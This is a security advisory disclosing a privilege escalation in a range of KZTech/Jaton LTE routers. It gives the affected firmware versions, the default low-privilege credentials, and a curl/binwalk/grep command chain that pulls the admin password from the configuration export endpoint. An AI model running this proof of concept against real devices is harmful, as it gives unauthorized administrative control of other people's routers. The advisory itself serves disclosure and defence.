KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Privilege Escalation  
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.  
Product web page: | |  
Affected version: Model | Firmware  
JT3500V | 2.0.1B1064  
JT3300V | 2.0.1B1047  
AM6200M | 2.0.0B3210  
AM6000N | 2.0.0B3042  
AM5000W | 2.0.0B3037  
AM4200M | 2.0.0B2996  
AM4100V | 2.0.0B2988  
AM3500MW | 2.0.0B1092  
AM3410V | 2.0.0B1085  
AM3300V | 2.0.0B1060  
AM3100E | 2.0.0B981  
AM3100V | 2.0.0B946  
AM3000M | 2.0.0B21  
KZ7621U | 2.0.0B14  
KZ3220M | 2.0.0B04  
KZ3120R | 2.0.0B01  
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi  
& VoIP CPE product specially designed to enable quick and easy  
LTE fixed data service deployment for residential and SOHO customers.  
It provides high speed LAN, Wi-Fi and VoIP integrated services  
to end users who need both bandwidth and multi-media data service  
in residential homes or enterprises. The device has 2 Gigabit LAN  
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and  
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing  
and firewall software for security. It provides an effective  
all-in-one solution to SOHO or residential customers. It can  
deliver up to 1Gbps max data throughput which can be very  
competitive to wired broadband access service.  
Desc: The application suffers from a privilege escalation vulnerability.  
The non-privileged default user (user:user123) can elevate his/her  
privileges by sending a HTTP GET request to the configuration export  
endpoint and disclose the admin password. Once authenticated as admin,  
an attacker will be granted access to the additional and privileged pages.  
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN  
Linux 2.6.36+ (mips)  
Mediatek APSoC SDK v4.3.1.0  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2021-5645  
Advisory URL:  
$ curl -sk \  
-o config.dat \  
'' ; \  
binwalk -e config.dat ; \  
cd _config.dat_extracted ; \  
strings * | grep -ni 'Login\|Password' ; \  
cd ..